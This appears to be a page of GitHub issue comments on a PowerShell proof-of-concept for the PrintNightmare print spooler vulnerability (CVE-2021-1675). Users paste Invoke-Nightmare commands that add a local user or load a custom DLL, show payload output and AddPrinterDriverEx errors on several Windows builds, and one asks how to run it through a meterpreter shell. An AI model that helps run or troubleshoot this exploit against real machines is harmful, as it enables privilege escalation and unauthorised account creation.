calebstewart / cve-2021-1675 Goto Github PK

I ran the program on Windows 10 20H2 and I was presented with an error.

Invoke-Nightmare : [!] AddPrinterDriverEx failed.

PS C:\Users\test\Desktop\CVE-2021-1675-main\CVE-2021-1675-main> Invoke-Nightmare -NewUser "Berk" -NewPassword "TestBerk"
[+] created payload at C:\Users\test\AppData\Local\Temp\103\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_3138b2c823dd1ea9\Amd64\mxdwdrv.dll"
Invoke-Nightmare : [!] AddPrinterDriverEx failed
At line:1 char:1

• Invoke-Nightmare -NewUser "Berk" -NewPassword "TestBerk"

•   + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-Nightmare
  

works perfectly on win 10 - 18363.592 domain controlled pc

but not working on Version 10.0.19042.1052 tested on 3 different pc.

Hi!
thanks for the poweshell implementation!
I have a problem with exploit which outputs the following:
Invoke-Nightmare : [!] AddPrinterDriverEx failed At line:1 char:1

• Invoke-Nightmare -DLL "C:\CVE-2021-1675\adduser.dll" + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-Nightmare

trying on windows server 2016 with print spooler enabled.

Would you recommend anything I could do to resolve this? Thanks!

The log says everything is fine

but the user is not created, because the password was not policy compliant.
There should be a check if the user is really created or just the exploit has run (I saw that the DLL code contains no check on user creation and adding to the group).

Hello,

tryed on Win10 1803 (17134) and 21H1 (19043)

If I do the script local it works , but remote via meterpreter shell it stops here:

How to get it work ?